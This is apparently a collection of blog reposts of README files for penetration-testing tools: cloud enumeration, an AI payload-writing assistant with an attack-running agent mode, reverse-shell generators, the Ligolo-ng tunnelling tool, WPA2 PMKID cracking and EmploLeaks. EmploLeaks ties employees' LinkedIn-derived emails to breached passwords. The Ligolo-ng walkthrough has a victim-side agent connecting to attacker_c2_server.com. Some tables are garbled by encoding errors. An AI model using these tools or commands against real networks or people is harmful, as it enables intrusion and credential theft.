The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m and/or -b.

You can provide multiple keywords by specifying the -k argument multiple times.

Keywords are mutated automatically using strings from enum_tools/fuzz.txt or a file you provide with the -m flag. Services that require a second-level of brute forcing (Azure Containers and GCP Functions) will also use fuzz.txt by default or a file you provide with the -b flag.

Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:

./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey

HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example to increase to 10.

./cloud_enum.py -k keyword -t 10

IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.

Complete Usage Details

usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]

Multi-cloud enumeration utility. All hail OSINT!

optional arguments:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default: enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Will APPEND found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv - defaults to text)
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans

Thanks

So far, I have borrowed from: - Some of the permutations from GCPBucketBrute



Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals

By: Zion3R


Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


Pentest Muse Web App

In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.

Disclaimer

This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

Requirements

  • Python 3.12 or later
  • Necessary Python packages as listed in requirements.txt

Setup

Standard Setup

  1. Clone the repository:

git clone https://github.com/pentestmuse-ai/PentestMuse cd PentestMuse

  1. Install the required packages:

pip install -r requirements.txt

Alternative Setup (Package Installation)

Install Pentest Muse as a Python Package:

pip install .

Running the Application

Chat Mode (Default)

In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

python run_app.py

or

pmuse

Agent Mode (Experimental)

You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program with agent model, you can use:

python run_app.py agent

or

pmuse agent

Selection of Language Models

Managed APIs

You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.

OpenAI API keys

Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key] when starting the program.

Contact

For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.



Kali Linux 2024.1 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R

Time for another Kali Linux release! – Kali Linux 2024.1. This release has various impressive updates.


The summary of the changelog since the 2023.4 release from December is:

Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!


Features
  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

Usage
secbutler -h

This will display the help for the tool

                   __          __  __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/

v0.1.9 - https://github.com/groundsec/secbutler

Essential utilities for pentester, bug-bounty hunters and security researchers

Usage:
secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

Flags:
-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.



Installation

Run the following command to install the latest version:

go install github.com/groundsec/secbutler@latest

Or you can simply grab an executable from the Releases page.


License

secbutler is made with πŸ–€ by the GroundSec team and released under the MIT LICENSE.



PurpleKeep - Providing Azure Pipelines To Create An Infrastructure And Run Atomic Tests

By: Zion3R


With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.

To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.

Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.

Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.

To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.

TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.


Requirements

The project is based on Azure Pipelines and requires the following to be able to run:

  • Azure Service Connection to a resource group as described in the Microsoft Docs
  • Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
  • MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and make it accessible to the pipelines

Optional

You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.

Refer to the variables file for your configurable items.

Design

Infrastructure

Deploying the infrastructure uses the Azure Pipeline to perform the following steps:

  • Deploy Azure services:
    • Key Vault
    • Log Analytics Workspace
    • Data Connection Endpoint
    • Data Connection Rule
  • Generate SSH keypair and password for the Windows account and store in the Key Vault
  • Create a Windows 11 VM
  • Install OpenSSH
  • Configure and deploy the SSH public key
  • Install Invoke-AtomicRedTeam
  • Install Microsoft Defender for Endpoint and configure exceptions
  • (Optional) Apply security and/or audit policy files
  • Reboot

Simulation

Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:

  • T1059.003
  • T1027,T1049,T1003

The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.

There are currently two ways to run the simulation:

Rotating simulation

This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.

Warning: this will onboard a large number of hosts into your EDR

Single deploy simulation

A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.

TODO

Must have

  • Check if pre-reqs have been fullfilled before executing the atomic
  • Provide the ability to import own group policy
  • Cleanup biceps and pipelines by using a master template (Complete build)
  • Build pipeline that runs technique sequently with reboots in between
  • Add Azure ServiceConnection to variables instead of parameters

Nice to have

  • MDE Off-boarding (?)
  • Automatically join and leave AD domain
  • Make Atomics repository configureable
  • Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
  • Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
  • Add C2 infrastructure for manual or C2 based simulations

Issues

  • Atomics do not return if a simulation succeeded or not
  • Unreliable OpenSSH extension installer failing infrastructure deployment
  • Spamming onboarded devices in the EDR

References



Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R


Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

As an example, for a TCP connection:

  • SYN are translated to connect() on remote
  • SYN-ACK is sent back if connect() succeed
  • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
  • Nothing is sent if timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng Β» session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] Β» ifconfig 
[...]
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Interface 3 β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Name β”‚ wlp3s0 β”‚
β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe β”‚
β”‚ MTU β”‚ 1500 β”‚
β”‚ Flags β”‚ up|broadcast|multicast β”‚
β”‚ IPv4 Address β”‚ 192.168.0.30/24 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx MΓ©t MTU Γ‰tat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] Β» listener_list 
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Active listeners β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€ ───────────────────┬─────────────────────────
β”‚ # β”‚ AGENT β”‚ AGENT LISTENER ADDRESS β”‚ PROXY REDIRECT ADDRESS β”‚
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€& #9508;
β”‚ 0 β”‚ nchatelain@nworkstation β”‚ 0.0.0.0:1234 β”‚ 127.0.0.1:4321 β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

Caveats

Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.

Todo

  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.

Credits

  • Nicolas Chatelain <nicolas -at- chatelain.me>


Rayder - A Lightweight Tool For Orchestrating And Organizing Your Bug Hunting Recon / Pentesting Command-Line Workflows

By: Zion3R


Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.


Installation

To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:

go install github.com/devanshbatham/rayder@v0.0.4

Usage

Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:

rayder -w path/to/workflow.yaml

Workflow Configuration

A workflow is defined in a YAML file with the following structure:

vars:
VAR_NAME: value
# Add more variables...

parallel: true|false
modules:
- name: task-name
cmds:
- command-1
- command-2
# Add more commands...
silent: true|false
# Add more modules...

Using Variables in Workflows

Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).

Defining Variables

To define variables, add them to the vars section of your workflow YAML file:

vars:
VAR_NAME: value
ANOTHER_VAR: another_value
# Add more variables...

Referencing Variables in Commands

You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:

modules:
- name: example-task
cmds:
- echo "Output directory {{OUTPUT_DIR}}"

Supplying Variables via the Command Line

You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:

rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value

If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.

Remember that variables supplied via the command line will override the default values defined in the YAML configuration.

Example

Example 1:

Here's an example of how you can define, reference, and supply variables in your workflow configuration:

vars:
ORG: "example.org"
OUTPUT_DIR: "results"

modules:
- name: example-task
cmds:
- echo "Organization {{ORG}}"
- echo "Output directory {{OUTPUT_DIR}}"

When executing the workflow, you can provide values for ORG and OUTPUT_DIR via the command line like this:

rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir

This will override the default values and use the provided values for these variables.

Example 2:

Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:

vars:
ORG: "Acme, Inc"
OUTPUT_DIR: "results-dir"

parallel: false
modules:
- name: reverse-whois
silent: false
cmds:
- mkdir -p {{OUTPUT_DIR}}
- revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt

- name: finding-subdomains
cmds:
- xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
silent: false

- name: cleaning-subdomains
cmds:
- cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
- rm *.out
silent: true

- name: resolving-subdomains
cmds:
- cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
silent: false

- name: checking-alive-subdomains
cmds:
- cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 0 -o {{OUTPUT_DIR}}/alive-subdomains.txt
silent: false

To execute the above workflow, run the following command:

rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results

Parallel Execution

The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.

Workflows

Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!

Inspiration

Inspiration of this project comes from Awesome taskfile project.



Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
  2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
  • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
  • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials

By: Zion3R

Β 

This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.

How it Works

The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You an easily add yours and connect to through the tool.


Installation

To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:

cd cli
pip install -r requirements.txt

OSX

We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it running:

cd cli
python3 -m pip install psycopg2-binary`

Basic Usage

To use the tool, simply run the following command:

python3 cli/emploleaks.py

If everything went well during the installation, you will be able to start using EmploLeaks:

___________              .__         .__                 __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/

OSINT tool Γ°ΕΈβ€’Β΅ to chain multiple apis
emploleaks>

Right now, the tool supports two functionalities:

  • Linkedin, for searching all employees from a company and get their personal emails.
    • A GitLab extension, which is capable of finding personal code repositories from the employees.
  • If defined and connected, when the tool is gathering employees profiles, a search to a COMB database will be made in order to retrieve leaked passwords.

Retrieving Linkedin Profiles

First, you must set the plugin to use, which in this case is linkedin. After, you should set your authentication tokens and the run the impersonate process:

emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:

Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run i mpersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at

li_at and JSESSIONID are the authentication cookies of your LinkedIn session on the browser. You can use the Web Developer Tools to get it, just sign-in normally at LinkedIn and press right click and Inspect, those cookies will be in the Storage tab.

Now that the module is configured, you can run it and start gathering information from the company:

Get Linkedin accounts + Leaked Passwords

We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:

emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15

Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:

As a conclusion, the tool will generate a console output with the following information:
  • A list of employees of the company (obtained from LinkedIn)
  • The social network profiles associated with each employee (obtained from email address)
  • A list of leaked passwords associated with each email address.

How to build the indexed COMB database

An imortant aspect of this project is the use of the indexed COMB database, to build your version you need to download the torrent first. Be careful, because the files and the indexed version downloaded requires, at least, 400 GB of disk space available.

Once the torrent has been completelly downloaded you will get a file folder as following:

Ò”œÒ”€Ò”€ count_total.sh
Ò”œÒ”€Ò”€ data
Γ’β€β€š Ò”œÒ”€Ò”€ 0
Γ’β€β€š Ò”œÒ”€Ò”€ 1
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 0
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 1
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 2
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 3
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 4
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò&€ 5
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 6
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 7
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 8
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 9
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ a
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ b
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ c
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ d
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ e
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ f
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ g
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ h
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ i
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ j
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ k
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ l
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ m
Γ’β€β€š Γ’β€β€š Ò”œÒ €Ò”€ n
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ o
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ p
